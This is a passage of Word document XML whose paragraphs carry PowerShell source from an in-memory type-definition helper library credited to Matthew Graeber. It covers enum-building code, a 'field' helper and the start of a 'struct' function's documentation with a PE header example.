    <w:p w14:paraId="616D451B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3800F719" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [OutputType([Type])]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18144F34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F3E8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F9E0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 0, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF8270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BC61F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Module,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C7F62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="697FB08F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 1, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5559C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD21E94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC1CF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FD352" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EFAD558" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 2, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D761D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD06864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42419986" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69AB714F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 3, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126D669" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC7DDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Hashtable]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66759413" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $EnumElements,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE826E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="729E9485" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B494FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Bitfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C4DD04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FCF3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="279E9A33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Module -is [Reflection.Assembly])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E691A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462C45E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return ($Module.GetType($FullName))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C140D49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E79C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15A242A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $EnumType = $Type -as [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3AA1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15019272" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BE193" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77E9AD26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Bitfield)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4889C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519A19C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FlagsConstructor = [FlagsAttribute].GetConstructor(@())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359CED0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FE631" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EBD8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A4BDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="618D83B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ForEach ($Key in $EnumElements.Keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D025434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D651121" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Apply the specified enum type to each element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EE859" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03344B25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08336F63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3844CB23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $EnumBuilder.CreateType()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231C197" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC9E24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FAB8E36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="237BA43B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># A helper function used to reduce typing while defining struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59583397" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BFFEA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9800A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D561D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD7BC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441D0E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 0, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF787A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B0C4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Position,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B38D29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D3B37A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 1, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D31919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476B197" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887E212" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FF89BD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 2)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E5B26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B7972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Offset,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF16E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="634E8BEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B3EDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $MarshalAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6287ABD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7D469" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37FC854E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92CDE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Position = $Position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F255E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Type = $Type -as [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Offset = $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D1776" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        MarshalAs = $MarshalAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899DB04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173F76F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7FBAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56AEBE9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08D37D22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34742AA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67948C46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D64A32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9482A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13825198" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Creates an in-memory struct for use in your PowerShell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098101FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35365BF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Matthew Graeber (@mattifestation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01721142" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CC940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55915F89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450AF475" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5050FB07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB232B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F410A7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The 'struct' function facilitates the creation of structs entirely in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BCCB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        memory using as close to a "C style" as PowerShell will allow. Struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28DBD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        fields are specified using a hashtable where each field of the struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85FD9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        is comprosed of the order in which it should be defined, its .NET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5ECF85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        type, and optionally, its offset and special marshaling attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4BDB3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C26764C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        One of the features of 'struct' is that after your struct is defined,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9511DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        it will come with a built-in GetSize method as well as an explicit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DAED01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        converter so that you can easily cast an IntPtr to the struct without</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C30F50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        relying upon calling SizeOf and/or PtrToStructure in the Marshal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F42A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C2123" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="082FFEDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450C172" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1919FA7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The in-memory module that will host the struct. Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ABA9F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        New-InMemoryModule to define an in-memory module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A320D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="452F00D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F1450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09FB185C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The fully-qualified name of the struct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E225FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7ED826F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER StructFields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455B9338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="652BA747" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A hashtable of fields. Use the 'field' helper function to ease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD4A20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        defining each field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D186B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F29F333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PackingSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763A167" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3433B6E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specifies the memory alignment of fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC5E29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72B5251B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExplicitLayout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D7153" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DD14203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Indicates that an explicit offset for each field will be specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE4428" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CE98EEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371CA5CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6110F6BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Mod = New-InMemoryModule -ModuleName Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6D859" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6736BBCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF8FC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            DOS_SIGNATURE =    0x5A4D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB72C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            OS2_SIGNATURE =    0x454E</w:t>
      </w:r>
    </w:p>
